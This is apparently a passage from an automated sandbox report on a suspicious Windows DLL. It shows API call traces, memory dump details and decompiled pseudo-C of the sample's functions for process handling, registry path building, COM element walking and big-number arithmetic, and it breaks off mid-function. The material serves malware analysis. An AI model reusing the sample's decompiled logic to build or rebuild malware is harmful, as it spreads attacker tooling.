                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000102,02F911DA,?,?,00000000,00000000), ref: 02F915F7
                                                                                                                                                                                                                                      • Part of subcall function 02F97F27: lstrlen.KERNEL32(00000000,00000008,?,76D24D40,?,?,02F915A4,?,?,?,?,00000102,02F911DA,?,?,00000000), ref: 02F97F33
                                                                                                                                                                                                                                      • Part of subcall function 02F97F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02F915A4,?,?,?,?,00000102,02F911DA,?), ref: 02F97F91
                                                                                                                                                                                                                                      • Part of subcall function 02F97F27: lstrcpy.KERNEL32(00000000,00000000), ref: 02F97FA1
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 02F915EA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1449191863-0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F98F10(intOrPtr _a4) {
                                                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                                                    				void* _t5;
                                                                                                                                                                                                                                    				long _t6;
                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                    				 *0x2f9d26c = _t2;
                                                                                                                                                                                                                                    				if(_t2 == 0) {
                                                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t4 = GetVersion();
                                                                                                                                                                                                                                    				if(_t4 != 5) {
                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                    					if(_t13 <= 0) {
                                                                                                                                                                                                                                    						_t5 = 0x32;
                                                                                                                                                                                                                                    						return _t5;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					 *0x2f9d25c = _t4;
                                                                                                                                                                                                                                    					_t6 = GetCurrentProcessId();
                                                                                                                                                                                                                                    					 *0x2f9d258 = _t6;
                                                                                                                                                                                                                                    					 *0x2f9d264 = _a4;
                                                                                                                                                                                                                                    					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                                                                                                                    					 *0x2f9d254 = _t7;
                                                                                                                                                                                                                                    					if(_t7 == 0) {
                                                                                                                                                                                                                                    						 *0x2f9d254 =  *0x2f9d254 | 0xffffffff;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t4 > 0) {
                                                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t13 = _t4 - _t4;
                                                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02F96A90,?,?,00000001,?,?,?,02F9807D,?), ref: 02F98F18
                                                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000001,?,?,?,02F9807D,?), ref: 02F98F27
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02F9807D,?), ref: 02F98F3E
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02F9807D,?), ref: 02F98F5B
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000001,?,?,?,02F9807D,?), ref: 02F98F7A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
• Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2270775618-0
                                                                                                                                                                                                                                    • Opcode ID: ca08e3f66b68c5d26cb4a2c82770c9dab9c6f1a7c41f36578465e7a5de28a348
                                                                                                                                                                                                                                    • Instruction ID: eba0f1e98b352fcb5a1206e710c1b0283b5b738fda9ee04df91229699e35ef03
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca08e3f66b68c5d26cb4a2c82770c9dab9c6f1a7c41f36578465e7a5de28a348
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF06271EC43099BFB209F24AD09B14BB62A74ABC4F505D1BE342C61D0D7718061CF24
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			E02F917D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				signed int* _v16;
                                                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				char* _t60;
                                                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                                    				char _t68;
                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                                                    				char _t104;
                                                                                                                                                                                                                                    				signed int* _t106;
                                                                                                                                                                                                                                    				intOrPtr* _t107;
                                                                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t98 = __ecx;
                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                    				_t104 = _a16;
                                                                                                                                                                                                                                    				if(_t104 == 0) {
                                                                                                                                                                                                                                    					__imp__( &_v284,  *0x2f9d33c);
                                                                                                                                                                                                                                    					_t97 = 0x80000002;
                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                    					_t60 = E02F9809F(0,  &_v284);
                                                                                                                                                                                                                                    					_a8 = _t60;
                                                                                                                                                                                                                                    					if(_t60 == 0) {
                                                                                                                                                                                                                                    						_v8 = 8;
                                                                                                                                                                                                                                    						L29:
                                                                                                                                                                                                                                    						_t61 = _a20;
                                                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                                                    							 *_t61 =  *_t61 + 1;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						return _v8;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t107 = _a24;
                                                                                                                                                                                                                                    					if(E02F988B7(_t98, _t103, _t107, _t97, _t60) != 0) {
                                                                                                                                                                                                                                    						L27:
                                                                                                                                                                                                                                    						E02F99039(_a8);
                                                                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t65 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					_t16 = _t65 + 0x2f9e8fe; // 0x65696c43
                                                                                                                                                                                                                                    					_t68 = E02F9809F(0, _t16);
                                                                                                                                                                                                                                    					_a24 = _t68;
                                                                                                                                                                                                                                    					if(_t68 == 0) {
                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                    						_t29 = _t107 + 0x14; // 0x102
                                                                                                                                                                                                                                    						_t33 = _t107 + 0x10; // 0x3d02f9c0
                                                                                                                                                                                                                                    						if(E02F9A635(_t103,  *_t33, _t97, _a8,  *0x2f9d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                                                                                                                                                                                                    							_t72 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    							if(_t104 == 0) {
                                                                                                                                                                                                                                    								_t35 = _t72 + 0x2f9ea5f; // 0x4d4c4b48
                                                                                                                                                                                                                                    								_t73 = _t35;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t34 = _t72 + 0x2f9e89f; // 0x55434b48
                                                                                                                                                                                                                                    								_t73 = _t34;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							if(E02F9816C(_t73,  *0x2f9d334,  *0x2f9d338,  &_a24,  &_a16) == 0) {
                                                                                                                                                                                                                                    								if(_t104 == 0) {
                                                                                                                                                                                                                                    									_t75 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    									_t44 = _t75 + 0x2f9e871; // 0x74666f53
                                                                                                                                                                                                                                    									_t78 = E02F9809F(0, _t44);
                                                                                                                                                                                                                                    									_t105 = _t78;
                                                                                                                                                                                                                                    									if(_t78 == 0) {
                                                                                                                                                                                                                                    										_v8 = 8;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t47 = _t107 + 0x10; // 0x3d02f9c0
                                                                                                                                                                                                                                    										E02F92659( *_t47, _t97, _a8,  *0x2f9d338, _a24);
                                                                                                                                                                                                                                    										_t49 = _t107 + 0x10; // 0x3d02f9c0
                                                                                                                                                                                                                                    										E02F92659( *_t49, _t97, _t105,  *0x2f9d330, _a16);
                                                                                                                                                                                                                                    										E02F99039(_t105);
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t40 = _t107 + 0x10; // 0x3d02f9c0
                                                                                                                                                                                                                                    									E02F92659( *_t40, _t97, _a8,  *0x2f9d338, _a24);
                                                                                                                                                                                                                                    									_t43 = _t107 + 0x10; // 0x3d02f9c0
                                                                                                                                                                                                                                    									E02F92659( *_t43, _t97, _a8,  *0x2f9d330, _a16);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								if( *_t107 != 0) {
                                                                                                                                                                                                                                    									E02F99039(_a24);
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									 *_t107 = _a16;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L27;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t21 = _t107 + 0x10; // 0x3d02f9c0
                                                                                                                                                                                                                                    					if(E02F96BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                                                                                                                                                                                                    						_t106 = _v16;
                                                                                                                                                                                                                                    						_t88 = 0x28;
                                                                                                                                                                                                                                    						if(_v12 == _t88) {
                                                                                                                                                                                                                                    							 *_t106 =  *_t106 & 0x00000000;
                                                                                                                                                                                                                                    							_t26 = _t107 + 0x10; // 0x3d02f9c0
                                                                                                                                                                                                                                    							E02F9A635(_t103,  *_t26, _t97, _a8, _a24, _t106);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						E02F99039(_t106);
                                                                                                                                                                                                                                    						_t104 = _a16;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E02F99039(_a24);
                                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                                                                                                                                    					goto L29;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t103 = _a8;
                                                                                                                                                                                                                                    					E02F9A8D8(_t104, _a8,  &_v284);
                                                                                                                                                                                                                                    					__imp__(_t108 + _t104 - 0x117,  *0x2f9d33c);
                                                                                                                                                                                                                                    					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
                                                                                                                                                                                                                                    					_t97 = 0x80000003;
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                    0x02f918ea
                                                                                                                                                                                                                                    0x02f917ef
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91816
                                                                                                                                                                                                                                    0x02f91816
                                                                                                                                                                                                                                    0x02f91822
                                                                                                                                                                                                                                    0x02f91835
                                                                                                                                                                                                                                    0x02f9183b
                                                                                                                                                                                                                                    0x02f91843
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91843

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(02F93C81,0000005F,00000000,00000000,00000104), ref: 02F91808
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 02F91835
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: lstrlen.KERNEL32(?,00000000,02F9D330,00000001,02F92200,02F9D00C,02F9D00C,00000000,00000005,00000000,00000000,?,?,?,02F996C1,02F923E9), ref: 02F980A8
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: mbstowcs.NTDLL ref: 02F980CF
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: memset.NTDLL ref: 02F980E1
                                                                                                                                                                                                                                      • Part of subcall function 02F92659: lstrlenW.KERNEL32(02F93C81,?,?,02F919A9,3D02F9C0,80000002,02F93C81,02F98B1E,74666F53,4D4C4B48,02F98B1E,?,3D02F9C0,80000002,02F93C81,?), ref: 02F92679
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02F91857
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                                                                                                                    • String ID: \
                                                                                                                                                                                                                                    • API String ID: 3924217599-2967466578
                                                                                                                                                                                                                                    • Opcode ID: a85e78ea9e6c26caaa0059fc587fc06856440d15fe0fc73f8b094b1254ce014b
                                                                                                                                                                                                                                    • Instruction ID: c983555429491e74885d5f20cb5738a8b1481a1d7381c510682e1bec6699ba79
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a85e78ea9e6c26caaa0059fc587fc06856440d15fe0fc73f8b094b1254ce014b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1151297690020EBFEF11AFA1DD44EAB77BAAB093C4F108929FB1992160D731D925DF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                    			E02F952F9(intOrPtr* __eax) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				WCHAR* _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                    				short _v48;
                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                    				short _v64;
                                                                                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                                                                                                                    				intOrPtr _t57;
                                                                                                                                                                                                                                    				intOrPtr* _t58;
                                                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                    				intOrPtr* _t63;
                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                                                                    				intOrPtr* _t74;
                                                                                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                                                                                    				intOrPtr _t78;
                                                                                                                                                                                                                                    				intOrPtr* _t82;
                                                                                                                                                                                                                                    				intOrPtr* _t86;
                                                                                                                                                                                                                                    				intOrPtr _t102;
                                                                                                                                                                                                                                    				intOrPtr _t108;
                                                                                                                                                                                                                                    				void* _t117;
                                                                                                                                                                                                                                    				void* _t121;
                                                                                                                                                                                                                                    				void* _t122;
                                                                                                                                                                                                                                    				intOrPtr _t129;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t122 = _t121 - 0x3c;
                                                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                    				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                                                                                                                    				if(_t117 >= 0) {
                                                                                                                                                                                                                                    					_t54 = _v8;
                                                                                                                                                                                                                                    					_t102 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					_t5 = _t102 + 0x2f9e038; // 0x3050f485
                                                                                                                                                                                                                                    					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                                                                                                                    					_t56 = _v8;
                                                                                                                                                                                                                                    					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                                                                                                                    					if(_t117 >= 0) {
                                                                                                                                                                                                                                    						__imp__#2(0x2f9c2b0);
                                                                                                                                                                                                                                    						_v28 = _t57;
                                                                                                                                                                                                                                    						if(_t57 == 0) {
                                                                                                                                                                                                                                    							_t117 = 0x8007000e;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t60 = _v32;
                                                                                                                                                                                                                                    							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                                                                                                                    							_t86 = __imp__#6;
                                                                                                                                                                                                                                    							_t117 = _t61;
                                                                                                                                                                                                                                    							if(_t117 >= 0) {
                                                                                                                                                                                                                                    								_t63 = _v24;
                                                                                                                                                                                                                                    								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                                                                                                                    								if(_t117 >= 0) {
                                                                                                                                                                                                                                    									_t129 = _v20;
                                                                                                                                                                                                                                    									if(_t129 != 0) {
                                                                                                                                                                                                                                    										_v64 = 3;
                                                                                                                                                                                                                                    										_v48 = 3;
                                                                                                                                                                                                                                    										_v56 = 0;
                                                                                                                                                                                                                                    										_v40 = 0;
                                                                                                                                                                                                                                    										if(_t129 > 0) {
                                                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                                                    												_t67 = _v24;
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												_t122 = _t122;
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                                                                                                                                                                                                    												if(_t117 < 0) {
                                                                                                                                                                                                                                    													goto L16;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t69 = _v8;
                                                                                                                                                                                                                                    												_t108 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    												_t28 = _t108 + 0x2f9e0bc; // 0x3050f1ff
                                                                                                                                                                                                                                    												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                                                                                                                                                                                                    												if(_t117 >= 0) {
                                                                                                                                                                                                                                    													_t74 = _v16;
                                                                                                                                                                                                                                    													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                                                                                                                                                                                                    													if(_t117 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                    														_t78 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    														_t33 = _t78 + 0x2f9e078; // 0x76006f
                                                                                                                                                                                                                                    														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                                                                                                                    															_t82 = _v16;
                                                                                                                                                                                                                                    															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    														 *_t86(_v12);
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    													_t76 = _v16;
                                                                                                                                                                                                                                    													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t71 = _v8;
                                                                                                                                                                                                                                    												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                                                                                                                                                                                                    												_v40 = _v40 + 1;
                                                                                                                                                                                                                                    												if(_v40 < _v20) {
                                                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												goto L16;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                                                    								_t65 = _v24;
                                                                                                                                                                                                                                    								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							 *_t86(_v28);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t58 = _v32;
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t117;
                                                                                                                                                                                                                                    			}





































                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(02F9C2B0), ref: 02F95349
                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02F9542B
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F95444
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02F95473
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1885612795-0
                                                                                                                                                                                                                                    • Opcode ID: 6374adf3727b278898519961533998bf3df4de351637a567f5e4d549a13bde7e
                                                                                                                                                                                                                                    • Instruction ID: 1e6ca85e1d1fdcea9f6060435e997f476a42e3dfb8a2002d47fde27a6271fcaa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6374adf3727b278898519961533998bf3df4de351637a567f5e4d549a13bde7e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE517E71D00109EFDF01DFA8C9889AEF7BAEF89745B144584EA05EB210D731AD01CFA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                    			E02F91017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                    				void _v92;
                                                                                                                                                                                                                                    				void _v236;
                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                    				unsigned int _t56;
                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                                                    				void* _t92;
                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                    				signed int* _t99;
                                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                                    				signed int _t103;
                                                                                                                                                                                                                                    				void* _t107;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t92 = _a12;
                                                                                                                                                                                                                                    				_t101 = __eax;
                                                                                                                                                                                                                                    				_t55 = E02F9A7AA(_a16, _t92);
                                                                                                                                                                                                                                    				_t79 = _t55;
                                                                                                                                                                                                                                    				if(_t79 == 0) {
                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                    					return _t55;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                                                                                                                    				_t81 = 0;
                                                                                                                                                                                                                                    				_t96 = 0x20;
                                                                                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                    					_t97 = _t96 - _t81;
                                                                                                                                                                                                                                    					_v12 = _t96 - _t81;
                                                                                                                                                                                                                                    					E02F9968F(_t79,  &_v236);
                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02F98967(_t101,  &_v236, _a8, _t96 - _t81);
                                                                                                                                                                                                                                    					E02F98967(_t79,  &_v92, _a12, _t97);
                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                                                                                                                                                                                                    					_t66 = E02F9968F(_t101, 0x2f9d1b0);
                                                                                                                                                                                                                                    					_t103 = _t101 - _t79;
                                                                                                                                                                                                                                    					_a8 = _t103;
                                                                                                                                                                                                                                    					if(_t103 < 0) {
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						E02F9968F(_a16, _a4);
                                                                                                                                                                                                                                    						E02F91D6C(_t79,  &_v236, _a4, _t97);
                                                                                                                                                                                                                                    						memset( &_v236, 0, 0x8c);
                                                                                                                                                                                                                                    						_t55 = memset( &_v92, 0, 0x44);
                                                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                    							_push(1);
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push( *_t99);
                                                                                                                                                                                                                                    							L02F9B0C8();
                                                                                                                                                                                                                                    							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                                                                                                                    							asm("adc edx, esi");
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push(_v8 + 1);
                                                                                                                                                                                                                                    							_push(_t92);
                                                                                                                                                                                                                                    							_push(_t74);
                                                                                                                                                                                                                                    							L02F9B0C2();
